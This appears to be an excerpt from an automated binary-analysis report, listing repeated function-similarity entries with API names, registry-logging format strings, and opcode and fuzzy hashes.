                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                                                  • Opcode ID: 9d775fda3a458ba423f2584b4f03a94665879259268b20caf8ffe01fa55e4727
                                                                                                                                                  • Instruction ID: a147caebf27c5cc84515a3a275434ceebd35b7d7fd63e3ece370a6448063c2c1
                                                                                                                                                  • Opcode Fuzzy Hash: 9d775fda3a458ba423f2584b4f03a94665879259268b20caf8ffe01fa55e4727
                                                                                                                                                  • Instruction Fuzzy Hash: 8DE01252B1D60785E5219B49FD116792234EB74791F440136FF4EC65A0ED2CD5A9D304
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                                                  • Opcode ID: 121d7b192f278ed57b8867b485dd75cd00e68040ae21fcedfb5617aa17ed5c6e
                                                                                                                                                  • Instruction ID: 00891f70b37afdee7312dc840e3ef9878f964e1b2a15ef75eee97a82795950b1
                                                                                                                                                  • Opcode Fuzzy Hash: 121d7b192f278ed57b8867b485dd75cd00e68040ae21fcedfb5617aa17ed5c6e
                                                                                                                                                  • Instruction Fuzzy Hash: 6DE09212B1C60785E5209B08F9115792230EB74781F400136FF0EC26A0ED2CD5A5D300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                                                  • Opcode ID: e0ccdcdfff5306e8d1edb665a48736185a9a8bfcf0cc9128e54fb974368f81d1
                                                                                                                                                  • Instruction ID: 3c09d3bf51fed1be712cf0509245952065fb927642b733ff13503d6a03cc3d76
                                                                                                                                                  • Opcode Fuzzy Hash: e0ccdcdfff5306e8d1edb665a48736185a9a8bfcf0cc9128e54fb974368f81d1
                                                                                                                                                  • Instruction Fuzzy Hash: A2E09212B1C60785E5219B08FD115792234EB74780F400137FF0EC26A0ED2CD6A5D301
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                                                  • Opcode ID: 2ec1f107dc612dbc23df36b15b27c5509c6c2f0980d22f21ba96d8f5fe7989fd
                                                                                                                                                  • Instruction ID: 75cc5b76d21aeb817e44d932fac509d90980534e7b17ef90b4aa798640991213
                                                                                                                                                  • Opcode Fuzzy Hash: 2ec1f107dc612dbc23df36b15b27c5509c6c2f0980d22f21ba96d8f5fe7989fd
                                                                                                                                                  • Instruction Fuzzy Hash: DCE09212B1C60786E5209B48F9015792230EB74780F400137FF0EC26A0ED2CD5A5D300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                                                  • Opcode ID: c1dca2f90759a8d06f958ba9bdf689a9e618fea2f20c7b751fd119738c401fe0
                                                                                                                                                  • Instruction ID: 4ebb49abc1e362c5bc3055ac6475bb88f57777f08b2b58167497b06e706b191c
                                                                                                                                                  • Opcode Fuzzy Hash: c1dca2f90759a8d06f958ba9bdf689a9e618fea2f20c7b751fd119738c401fe0
                                                                                                                                                  • Instruction Fuzzy Hash: A4E09212B1C60785E6209F08F9015782230EB74780F400136FF4EC25A0ED2CD5E9D300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                                                  • API String ID: 1001908780-1337547089